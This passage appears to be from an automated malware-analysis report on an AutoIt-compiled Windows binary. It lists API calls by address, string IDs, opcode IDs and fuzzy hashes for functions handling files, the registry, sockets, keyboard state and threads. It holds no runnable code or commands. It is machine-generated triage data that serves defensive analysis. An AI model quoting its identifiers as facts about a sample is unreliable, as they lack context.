                            • _wcslen.LIBCMT ref: 0044BCBB
                            • _wcslen.LIBCMT ref: 0044BCD1
                            • SHFileOperationW.SHELL32(?), ref: 0044BD17
                            Strings
                            Similarity
                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                            • String ID: \*.*
                            APIs
                              • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                            • _wcslen.LIBCMT ref: 004335F2
                            • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                            • GetLastError.KERNEL32 ref: 0043362B
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                            • _wcsrchr.LIBCMT ref: 00433666
                              • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                            Strings
                            Similarity
                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                            • String ID: \
                            APIs
                            Strings
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            APIs
                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                            • __lock.LIBCMT ref: 00417981
                              • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                              • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                              • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                            • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                            • __lock.LIBCMT ref: 004179A2
                            • ___addlocaleref.LIBCMT ref: 004179C0
                            Strings
                            Similarity
                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                            • String ID: KERNEL32.DLL$pI
                            APIs
                            Similarity
                            • API ID: _memmove$_malloc
                            APIs
                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                            Similarity
                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                            • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                            • _memmove.LIBCMT ref: 0044B555
                            • _memmove.LIBCMT ref: 0044B578
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 0041523A
                            • __calloc_crt.LIBCMT ref: 00415246
                            • __getptd.LIBCMT ref: 00415253
                            • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                            • _free.LIBCMT ref: 0041529E
                            • __dosmaperr.LIBCMT ref: 004152A9
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            Similarity
                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0046C96E
                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                            Strings
                            Similarity
                            • API ID: Variant$Copy$ClearErrorInitLast
                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                            • gethostbyname.WSOCK32(?), ref: 004655A6
                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                            • _memmove.LIBCMT ref: 004656CA
                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                            • WSACleanup.WSOCK32 ref: 00465762
                            Similarity
                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                            • String ID:
                            • API String ID: 2945290962-0
                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                            APIs
                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                            Similarity
                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                            • String ID:
                            • API String ID: 1457242333-0
                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                            Similarity
                            • API ID: ConnectRegistry_memmove_wcslen
                            • String ID:
                            • API String ID: 15295421-0
                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • _wcstok.LIBCMT ref: 004675B2
                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                            • _wcscpy.LIBCMT ref: 00467641
                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                            • _wcslen.LIBCMT ref: 00467793
                            • _wcslen.LIBCMT ref: 004677BD
                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                            Strings
                            Similarity
                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                            • String ID: X
                            • API String ID: 780548581-3081909835
                            • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                            • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                            APIs
                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                            • CloseFigure.GDI32(?), ref: 0044751F
                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                            Similarity
                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                            • String ID:
                            • API String ID: 4082120231-0
                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                            Similarity
                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                            • String ID:
                            • API String ID: 2027346449-0
                            • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                            • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                            • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                            • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                            • GetMenu.USER32 ref: 0047A703
                            • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                            • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                            • _wcslen.LIBCMT ref: 0047A79E
                            • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                            • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                            Similarity
                            • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                            • String ID:
                            • API String ID: 3257027151-0
                            • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                            • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                            • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                            • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                            APIs
                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                            Similarity
                            • API ID: ErrorLastselect
                            • String ID:
                            • API String ID: 215497628-0
                            • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                            • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                            • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                            • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                            APIs
                            • GetParent.USER32(?), ref: 0044443B
                            • GetKeyboardState.USER32(?), ref: 00444450
                            • SetKeyboardState.USER32(?), ref: 004444A4
                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                            • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                            • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                            • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                            APIs
                            • GetParent.USER32(?), ref: 00444633
                            • GetKeyboardState.USER32(?), ref: 00444648
                            • SetKeyboardState.USER32(?), ref: 0044469C
                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                            • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                            • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                            • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                            APIs
                            Strings
                            Similarity
                            • API ID: __snwprintf__wcsicoll_wcscpy
                            • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                            • API String ID: 1729044348-3025626884
                            • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                            • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                            • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                            • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                            APIs
                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                            • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Similarity
                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                            • String ID:
                            • API String ID: 2354583917-0
                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                            APIs
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                            Similarity
                            • API ID: Window$Enable$Show$MessageMoveSend
                            • String ID:
                            • API String ID: 896007046-0
                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                            APIs
                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                            • GetFocus.USER32 ref: 00448ACF
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                            Similarity
                            • API ID: Window$Enable$Show$FocusMessageSend
                            • String ID:
                            • API String ID: 3429747543-0
                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                            • __swprintf.LIBCMT ref: 0045D4E9
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                            Strings
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu$\VH
                            • API String ID: 3164766367-2432546070
                            • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                            • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                            • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                            • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                            APIs
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                            Strings
                            Similarity
                            • API ID: MessageSend
                            • String ID: Msctls_Progress32
                            • API String ID: 3850602802-3636473452
                            • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                            • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                            • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                            • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                            APIs
                            Similarity
                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                            • String ID:
                            • API String ID: 3985565216-0
                            • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                            • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                            • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                            • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                            APIs
                            • _malloc.LIBCMT ref: 0041F707
                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                            • _free.LIBCMT ref: 0041F71A
                            Strings
                            Similarity
                            • API ID: AllocateHeap_free_malloc
                            • String ID: [B
                            • API String ID: 1020059152-632041663
                            • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                            • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                            • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                            • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                            • __calloc_crt.LIBCMT ref: 00413DB0
                            • __getptd.LIBCMT ref: 00413DBD
                            • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                            • _free.LIBCMT ref: 00413E07
                            • __dosmaperr.LIBCMT ref: 00413E12
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            Similarity
                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                            • String ID:
                            • API String ID: 155776804-0
                            • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                            • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                            • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                            • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                            APIs
                              • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                              • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                            • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                            Similarity
                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                            • String ID:
                            • API String ID: 1957940570-0
                            • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                            • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                            • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                            • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                            • ExitThread.KERNEL32 ref: 00413D4E
                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                            • __freefls@4.LIBCMT ref: 00413D74
                            Similarity
                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                            • String ID:
                            • API String ID: 259663610-0
                            • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                            • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                            • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                            • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                            APIs
                            • GetClientRect.USER32(?,?), ref: 004302E6
                            • GetWindowRect.USER32(00000000,?), ref: 00430316
                            • GetClientRect.USER32(?,?), ref: 00430364
                            • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                            • GetWindowRect.USER32(?,?), ref: 004303C3
                            • ScreenToClient.USER32(?,?), ref: 004303EC
                            Similarity
                            • API ID: Rect$Client$Window$MetricsScreenSystem
                            • String ID:
                            • API String ID: 3220332590-0
                            • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                            • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                            • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                            • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                            APIs
                            Similarity
                            • API ID: _malloc_wcslen$_strcat_wcscpy
                            • String ID:
                            • API String ID: 1612042205-0
                            • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                            • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                            • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                            • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove_strncmp
                            • String ID: >$U$\
                            • API String ID: 2666721431-237099441
                            • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                            • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                            • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                            • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                            APIs
